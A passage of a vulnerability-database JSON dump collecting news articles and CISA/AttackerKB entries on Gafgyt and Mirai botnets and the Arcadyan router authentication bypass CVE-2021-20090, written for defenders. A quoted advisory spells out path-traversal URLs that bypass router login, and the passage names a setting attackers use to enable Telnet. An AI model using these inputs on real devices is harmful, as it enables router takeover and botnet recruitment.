register**_](<https://attendee.gotowebinar.com/register/3127445778613605890?source=ART>)_**.**_\n", "cvss3": {}, "published": "2019-10-31T13:00:43", "type": "threatpost", "title": "Valve Source Engine, Fortnite Servers Crippled By Gafgyt Variant", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2014-8361", "CVE-2017-17215", "CVE-2017-18368"], "modified": "2019-10-31T13:00:43", "id": "THREATPOST:9CC8C9C750EB5EFD6E67DD7C0C8549FB", "href": "https://threatpost.com/valve-source-engine-fortnite-servers-crippled-by-gafgyt-variant/149719/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-04-16T13:53:14", "description": "Several variants of the Gafgyt Linux-based botnet malware family have incorporated code from the infamous Mirai botnet, researchers have discovered.\n\nGafgyt (a.k.a. Bashlite) is a [botnet that was first uncovered in 2014](<https://threatpost.com/mirai-gafgyt-botnets-return-to-target-infamous-apache-struts-sonicwall-flaws/137309/>). It targets vulnerable internet of things (IoT) devices like Huawei routers, Realtek routers and ASUS devices, which it then uses to launch large-scale distributed denial-of-service (DDoS) attacks. It also often uses known vulnerabilities such as CVE-2017-17215 and CVE-2018-10561 to download next-stage payloads to infected devices.\n\n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2019/02/19151457/subscribe2.jpg)](<https://threatpost.com/newsletter-sign/>)\n\nThe latest variants have now incorporated several Mirai-based modules, according to research from Uptycs [released Thursday](<https://www.uptycs.com/blog/mirai-code-re-use-in-gafgyt>), along with new exploits. Mirai variants and its code re-use have become more voluminous since the source code for the IoT botnet [was released](<https://threatpost.com/source-code-released-for-mirai-ddos-malware/121039/>) in October 2016.\n\nThe capabilities nicked from Mirai include various methods to carry out DDoS attacks, according to the research:\n\n * HTTP flooding, in which the botnet sends a large number of HTTP requests to a targeted server to overwhelm it;\n * UDP flooding, where the botnet sends several UDP packets to a victim server as a means of exhausting it;\n * Various TCP flood attacks, which exploit a normal three-way TCP handshake the victim server receives a heavy number of requests, resulting in the server becoming unresponsive;\n * And an STD module, which sends a random string (from a hardcoded array of strings) to a particular IP address.\n\n![](https://media.threatpost.com/wp-content/uploads/sites/103/2021/04/15120709/mirai-gafgyt.jpg)\n\nCode comparison for the HTTP DDoS module between Gafgyt and Mirai. Click to enlarge. Source: Uptycs.\n\nMeanwhile, the latest versions of Gafgyt contain new approaches for achieving initial compromise of IoT devices, Uptycs found; this is the first step in turning infected devices into bots to later perform DDoS attacks on specifically targeted IP addresses. These include a Mirai-copied module for Telnet brute-forcing, and additional exploits for existing vulnerabilities in Huawei, Realtek and GPON devices.\n\nThe Huawei exploit ([CVE-2017-17215](<https://nvd.nist.gov/vuln/detail/CVE-2017-17215>)) and the Realtek exploit ([CVE-2014-8361](<https://nvd.nist.gov/vuln/detail/CVE-2014-8361>)) are both used for remote code execution (RCE), to fetch and download the Gafgyt payload, according to the analysis.\n\n\u201cThe Gafgyt malware binary embeds RCE exploits for Huawei and Realtek routers, by which the malware binary, using \u2018wget\u2019 command, fetches the payload,\u201d according to Uptycs. \u201c[It] gives the execution permission to payload using \u2018chmod\u2019 command, [and] executes the payload.\u201d\n\nThe GPON exploit ([CVE-2018-10561](<https://nvd.nist.gov/vuln/detail/CVE-2018-10561>)) is used for authentication bypass in vulnerable Dasan GPON routers; here, the malware binary follows the same process, but can also remove the payload on command.\n\n\u201cThe IP addresses used for fetching the payloads were generally the open directories where malicious payloads for different architectures were hosted by the attacker,\u201d researchers added.\n\n## **IoT Botnet Variants Abound**\n\nIoT botnets like Gafgyt are constantly evolving. For instance, researchers in March discovered what they said is the first variant of the Gafgyt botnet family [to cloak its activity](<https://threatpost.com/d-link-iot-tor-gafgyt-variant/164529/>) using the Tor network.\n\nMirai hasn\u2019t disappeared either: a [new variant of the botnet](<https://threatpost.com/mirai-variant-sonicwall-d-link-iot/164811/>) was recently discovered targeting a slew of vulnerabilities in unpatched D-Link, Netgear and SonicWall devices. Since mid-February, the variant has been targeting six known vulnerabilities \u2013 and three previously unknown ones \u2013 in order to infect systems and add them to a botnet.\n\nIt\u2019s only the latest variant of Mirai [to come to light](<https://threatpost.com/new-mirai-variant-mukashi-targets-zyxel-nas-devices/153982/>). Last year, a version dubbed Mukashi was seen taking advantage of a pre-authentication command-injection vulnerability found in Zyxel NAS storage devices.\n\n\u201cMalware authors may not always innovate, and researchers often discover that malware authors copy and re-use leaked malware source code,\u201d Uptycs researchers said.\n\nTo protect against these kinds of botnet infections, users should regularly monitor for suspicious processes, events and network traffic spawned on the execution of any untrusted binary, researchers recommended. And, users should keep all systems and firmware updated with the latest releases and patches.\n\n**_Ever wonder what goes on in underground cybercrime forums? Find out on April 21 at 2 p.m. ET during a _****_[FREE Threatpost event](<https://threatpost.com/webinars/underground-markets-a-tour-of-the-dark-economy/?utm_source=ART&utm_medium=ART&utm_campaign=April_webinar>)_****_, \u201cUnderground Markets: A Tour of the Dark Economy.\u201d Experts from Digital Shadows (Austin Merritt), Malwarebytes (Adam Kujawa) and Sift (Kevin Lee) will take you on a guided tour of the Dark Web, including what\u2019s for sale, how much it costs, how hackers work together and the latest tools available for hackers. _****_[Register here](<https://threatpost.com/webinars/underground-markets-a-tour-of-the-dark-economy/?utm_source=ART&utm_medium=ART&utm_campaign=April_webinar>)_****_ for the Wed., April 21 LIVE event. _**\n\n**_ _**\n", "cvss3": {}, "published": "2021-04-15T16:35:53", "type": "threatpost", "title": "Gafgyt Botnet Lifts DDoS Tricks from Mirai", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2014-8361", "CVE-2017-17215", "CVE-2018-10561", "CVE-2021-24027"], "modified": "2021-04-15T16:35:53", "id": "THREATPOST:DC4DAA2C2F91148A88C3494B6E55F309", "href": "https://threatpost.com/gafgyt-botnet-ddos-mirai/165424/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-09T19:54:43", "description": "An authentication-bypass vulnerability affecting multiple routers and internet-of-things (IoT) devices is being actively exploited in the wild, according to researchers.\n\nThe security flaw, tracked as CVE-2021-20090, was disclosed last week by researchers at Tenable. It affects devices from 20 different vendors and ISPs (ADB, Arcadyan, ASMAX, ASUS, Beeline, British Telecom, Buffalo, Deutsche Telekom, HughesNet, KPN, O2, Orange, Skinny, SparkNZ, Telecom [Argentina], TelMex, Telstra, Telus, Verizon and Vodafone), all of which use the same firmware from Arcadyan. In all, millions of devices worldwide could be vulnerable.\n\nTenable [demonstrated](<https://www.tenable.com/security/research/tra-2021-13>) in a proof of concept (PoC) that it\u2019s possible to modify a device\u2019s configuration to enable Telnet on a vulnerable router and gain root level shell access to the device.\n\n[![](https://media.threatpost.com/wp-content/uploads/sites/103/2019/02/19151457/subscribe2.jpg)](<https://threatpost.com/newsletter-sign/>)\n\n\u201cThe vulnerability exists due to a list of folders which fall under a \u2018bypass list\u2019 for authentication,\u201d according to Tenable\u2019s advisory on August 3. \u201cFor most of the devices listed, that means that the vulnerability can be triggered by multiple paths. For a device in which http://<ip>/index.htm requires authentication, an attacker could access index.htm using the following paths:\n\n * http://<ip>/images/..%2findex.htm\n * http://<ip>/js/..%2findex.htm\n * http://<ip>/css/..%2findex.htm\n\n\u201cTo have the pages load properly, one will need to use proxy match/replace settings to ensure any resources loaded which require authentication also leverage the path traversal,\u201d the advisory continued.\n\n## **Exploited to Spread Mirai Variant**\n\nJust three days after disclosure, on Friday, cybersecurity researchers from Juniper Networks said they had discovered active exploitation of the bug.\n\n\u201cWe have identified some attack patterns that attempt to exploit this vulnerability in the wild coming from an IP address located in Wuhan, Hubei province, China,\u201d they wrote [in a post](<https://blogs.juniper.net/en-us/security/freshly-disclosed-vulnerability-cve-2021-20090-exploited-in-the-wild>). \u201cThe attacker seems to be attempting to deploy a [Mirai variant](<https://threatpost.com/mirai-variant-sonicwall-d-link-iot/164811/>) on the affected routers.\u201d\n\nCleaving close to Tenable\u2019s PoC, the attackers are modifying the configuration of the attacked device to enable Telnet using \u201cARC_SYS_TelnetdEnable=1\u201d to take control, according to Juniper. Then, they proceed to download the Mirai variant from a command-and-control (C2) server and execute it.\n\nMirai is a long-running botnet that infects connected devices and can be used to mount distributed denial-of-service (DDoS) attacks. It [burst on the scene](<https://threatpost.com/mirai-masterminds-helping-fbi-snuff-out-cybercrime/137556/>) in 2016, when it overwhelmed servers at the Dyn web hosting company, taking down more than 1,200 websites, including Netflix and Twitter. Its source code [was leaked](<https://threatpost.com/source-code-released-for-mirai-ddos-malware/121039/>) later that year, after which multiple Mirai variants began to crop up, in a barrage that continues to this day.\n\nSome of the scripts in the current set of attacks bear resemblance to previously observed activity picked up in February and March, according to Juniper.\n\n\u201cThe similarity could indicate that the same threat actor is behind this new attack and attempting to upgrade their infiltration arsenal with yet another freshly disclosed vulnerability,\u201d researchers wrote. \u201cGiven that most people may not even be aware of the security risk and won\u2019t be upgrading their device anytime soon, this attack tactic can be very successful, cheap and easy to carry out.\u201d\n\nIn addition to the router bug, Juniper researchers observed the following known vulnerabilities being exploited to gain initial access to target devices:\n\n * CVE-2020-29557 (DLink routers)\n * CVE-2021-1497 and CVE-2021-1498 (Cisco HyperFlex)\n * CVE-2021-31755 (Tenda AC11)\n * CVE-2021-22502 (MicroFocus OBR)\n * CVE-2021-22506 (MicroFocus AM)\n\nIn fact, the attackers have been continuously adding new exploits to its arsenal, according to the posting, and CVE-2021-20090 is unlikely to be the last.\n\n\u201cIt is clear that threat actors keep an eye on all disclosed vulnerabilities,\u201d researchers concluded. \u201cWhenever an exploit PoC is published, it often takes them very little time to integrate it into their platform and launch attacks.\u201d\n\nTo avoid compromise, users should update their firmware on the router.\n\n\u201cIn the case of IoT devices or home gateways, the situation is much worse as most users are not tech-savvy and even those who are do not get informed about potential vulnerabilities and patches to apply,\u201d according to Juniper. \u201cThe only sure way to remedy this issue is to require vendors to offer zero-down-time automatic updates.\u201d\n\n**![Threatpost Webinar Series ](https://media.threatpost.com/wp-content/uploads/sites/103/2021/07/27093135/threatpost-webinar-300x51.jpg)Worried about where the next attack is coming from? We\u2019ve got your back. **[REGISTER NOW](<https://threatpost.com/webinars/how-to-think-like-a-threat-actor/?utm_source=ART&utm_medium=ART&utm_campaign=August_Uptycs_Webinar>)** for our upcoming live webinar, How to **Think Like a Threat Actor**, in partnership with Uptycs on Aug. 17 at 11 AM EST and find out precisely where attackers are targeting you and how to get there first. Join host Becky Bracken and Uptycs researchers Amit Malik and Ashwin Vamshi on **[Aug. 17 at 11AM EST for this LIVE discussion](<https://threatpost.com/webinars/how-to-think-like-a-threat-actor/?utm_source=ART&utm_medium=ART&utm_campaign=August_Uptycs_Webinar>)**.**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-08-09T19:41:30", "type": "threatpost", "title": "Auth Bypass Bug Exploited, Millions of Routers Affected", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-29557", "CVE-2021-1497", "CVE-2021-1498", "CVE-2021-20090", "CVE-2021-22502", "CVE-2021-22506", "CVE-2021-31755"], "modified": "2021-08-09T19:41:30", "id": "THREATPOST:B22B0A1A6387CE704157F8EBBA162D1E", "href": "https://threatpost.com/auth-bypass-bug-routers-exploited/168491/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "malwarebytes": [{"lastseen": "2021-08-09T18:34:08", "description": "The early bird catches the worm. Unless the worm was early enough to hide.\n\nOn August 3, 2021 a vulnerability that was discovered by [Tenable](<https://medium.com/tenable-techblog/bypassing-authentication-on-arcadyan-routers-with-cve-2021-20090-and-rooting-some-buffalo-ea1dd30980c2>) was made public. Only two days later, on August 5, [Juniper Threat Labs](<https://blogs.juniper.net/en-us/security/freshly-disclosed-vulnerability-cve-2021-20090-exploited-in-the-wild>) identified some attack patterns that attempted to exploit this vulnerability in the wild. The vulnerability is listed as CVE-2021-20090.\n\n### Router firmware\n\nPublicly disclosed computer security flaws are listed in the Common Vulnerabilities and Exposures (CVE) database. Its goal is to make it easier to share data across separate vulnerability capabilities (tools, databases, and services). Under the [description of CVE-2021-20090](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20090>) you will find:\n\n> \u201ca path traversal vulnerability in the web interfaces of Buffalo WSR-2533DHPL2 firmware version <= 1.02 and WSR-2533DHP3 firmware version <= 1.24 could allow unauthenticated remote attackers to bypass authentication.\u201d\n\nBut during the disclosure process for the issues discovered in the Buffalo routers, Tenable discovered that CVE-2021-20090 affected many more devices, as the root cause of the vulnerability exists in the underlying Arcadyan firmware. In its synopsis, [Tenable lists](<https://www.tenable.com/security/research/tra-2021-13>) some 36 devices that have been confirmed to be affected. The list of affected devices include some of today\u2019s biggest router vendors and internet service providers, such as ASUS, Orange, Vodafone, Telstra, Verizon, Deutsche Telekom, and British Telecom.\n\nThe path traversal vulnerability means that some files on the devices can be accessed without authentication because they fall under a bypass list. Attackers can use this vulnerability to bypass authentication procedures on the affected routers and modems to enable the Telnet service, which will allow threat actors to connect to devices remotely and take over control of the affected device. The full technical details of the discovery and the Proof-of-Concept (PoC) can be found in the [Tenable TechBlog](<https://medium.com/tenable-techblog/bypassing-authentication-on-arcadyan-routers-with-cve-2021-20090-and-rooting-some-buffalo-ea1dd30980c2>).\n\n### Quick response\n\nOnce again, the importance of responsible disclosure is demonstrated since it only took threat actors two days after the publication of a PoC to add this vulnerability to their arsenal. The threat actor seems to be attempting to deploy a Mirai variant on the affected routers using scripts similar to those found to be used against devices from vendors like SonicWall, D-Link, Netgear, Cisco, Tenda, MicroFocus, and Netis. This same threat actor was found earlier to serve a Mirai variant leveraging [CVE-2021-27561](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27561>) and [CVE-2021-27562](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27562>), just hours after vulnerability details were published.\n\n### Mirai\n\nMirai is the name of the malware behind one of the most active and well-known Internet-of-Things (IoT) botnets. It started with Mirai taking advantage of insecure IoT devices in a simple but clever way. It scanned big blocks of the internet for open Telnet ports, then attempted to log in using default passwords. In this way, it was able to quickly corral an army of small, Internet-connected "smart" devices, like cameras, into a botnet.\n\nYou may remember hearing about this botnet after the [massive East Coast internet outage of 2016](<https://blog.malwarebytes.com/malwarebytes-news/2020/11/iot-antivirus-on-your-smart-device/>) when the Mirai botnet was leveraged in a [DDoS attack](<https://blog.malwarebytes.com/security-world/technology/2018/03/ddos-attacks-are-growing-what-can-businesses-do/>) aimed at Dyn, an Internet infrastructure company. Traffic to Dyn's Internet directory servers throughout the US\u2014primarily on the East Coast but later on the opposite end of the country as well\u2014was stopped by a flood of malicious requests from tens of millions of IP addresses disrupting the system.\n\nAfter the source code of the original Mirai botnet was leaked, this code was quickly replicated by other cybercriminals, so there are now several independent operators each running their own Mirai-based botnets. These operators are engaged in an ongoing competition to find new victims and hijack devices from each other. The original authors of Mirai were convicted for leasing their botnet out for DDoS attacks and click fraud. But their successors are still very much using the foundations of the first Mirai botnet.\n\n### Mitigation\n\nThe vulnerability was patched in April and owners of any of the affected devices listed in the table mentioned above are advised to ask their router vendor for security patches. Tenable reported the issues to the [CERT Coordination Center](<https://kb.cert.org/vuls/>) for help with contacting and tracking all the affected vendors.\n\nWhat is worrying about the current situation is that many of the owners of vulnerable devices are home users that were provided with the device by their internet provider. They may have no idea whether their device is vulnerable and even if they do, they will likely need guidance to apply a firmware upgrade.\n\nThe post [Home routers are being hijacked using vulnerability disclosed just 2 days ago](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/08/home-routers-are-being-hijacked-using-vulnerability-disclosed-just-2-days-ago/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-08-09T17:06:56", "type": "malwarebytes", "title": "Home routers are being hijacked using vulnerability disclosed just 2 days ago", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-20090", "CVE-2021-27561", "CVE-2021-27562"], "modified": "2021-08-09T17:06:56", "id": "MALWAREBYTES:9156CCFB50997087736CE5E4ED7435CB", "href": "https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/08/home-routers-are-being-hijacked-using-vulnerability-disclosed-just-2-days-ago/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cisa_kev": [{"lastseen": "2022-08-10T17:26:47", "description": "In Arm Trusted Firmware M through 1.2, the NS world may trigger a system halt, an overwrite of secure data, or the printing out of secure data when calling secure functions under the NSPE handler mode. This vulnerability has known active exploitation against Yealink Device Management servers. It is assessed this product utilizes the affected Arm firmware.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 5.5, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-11-03T00:00:00", "type": "cisa_kev", "title": "Arm Trusted Firmware M through 1.2 Denial-of-Service", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 4.9, "vectorString": "AV:L/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-27562"], "modified": "2021-11-03T00:00:00", "id": "CISA-KEV-CVE-2021-27562", "href": "", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2022-08-10T17:26:47", "description": "Yealink Device Management (DM) 3.6.0.20 allows command injection as root via the /sm/api/v1/firewall/zone/services URI, without authentication", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-03T00:00:00", "type": "cisa_kev", "title": "Yealink Device Management Server Pre-Authorization SSRF", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-27561"], "modified": "2021-11-03T00:00:00", "id": "CISA-KEV-CVE-2021-27561", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-08-10T17:26:47", "description": "Netis WF2419 is vulnerable to authenticated Remote Code Execution (RCE) as root through the router Web management page. The vulnerability has been found in firmware version V1.2.31805 and V2.2.36123", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-03T00:00:00", "type": "cisa_kev", "title": "Netis WF2419 Router Tracert Remote Code Execution vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 8.5, "vectorString": "AV:N/AC:M/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19356"], "modified": "2021-11-03T00:00:00", "id": "CISA-KEV-CVE-2019-19356", "href": "", "cvss": {"score": 8.5, "vector": "AV:N/AC:M/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-08-10T17:26:47", "description": "D-Link DNS-320 FW v2.06B01 Revision Ax is affected by command injection in the system_mgr.cgi component, which can lead to remote arbitrary code execution.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-03T00:00:00", "type": "cisa_kev", "title": "D-Link DNS-320 Command Injection Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-25506"], "modified": "2021-11-03T00:00:00", "id": "CISA-KEV-CVE-2020-25506", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-10T17:26:47", "description": "Remote Code execution vulnerability in Micro Focus Operation Bridge Reporter (OBR) product, affecting version 10.40. The vulnerability could be exploited to allow Remote Code Execution on the OBR server.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-03T00:00:00", "type": "cisa_kev", "title": "Micro Focus Operation Bridge Report (OBR) Server Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22502"], "modified": "2021-11-03T00:00:00", "id": "CISA-KEV-CVE-2021-22502", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-08-10T17:26:47", "description": "NETGEAR JGS516PE devices before 2.6.0.43 are affected by lack of access control at the function level.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-03T00:00:00", "type": "cisa_kev", "title": "Netgear ProSAFE Plus JGS516PE Remote Code Execution vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-26919"], "modified": "2021-11-03T00:00:00", "id": "CISA-KEV-CVE-2020-26919", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "attackerkb": [{"lastseen": "2023-01-21T11:13:30", "description": "In Arm Trusted Firmware M through 1.2, the NS world may trigger a system halt, an overwrite of secure data, or the printing out of secure data when calling secure functions under the NSPE handler mode.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 5.5, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-05-25T00:00:00", "type": "attackerkb", "title": "CVE-2021-27562", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 4.9, "vectorString": "AV:L/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-27562"], "modified": "2021-06-09T00:00:00", "id": "AKB:0F9260AA-94E1-4977-804E-30BF58B4B639", "href": "https://attackerkb.com/topics/wk6dEoU6h7/cve-2021-27562", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2023-01-24T17:13:48", "description": "Yealink Device Management (DM) 3.6.0.20 allows command injection as root via the /sm/api/v1/firewall/zone/services URI, without authentication.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", 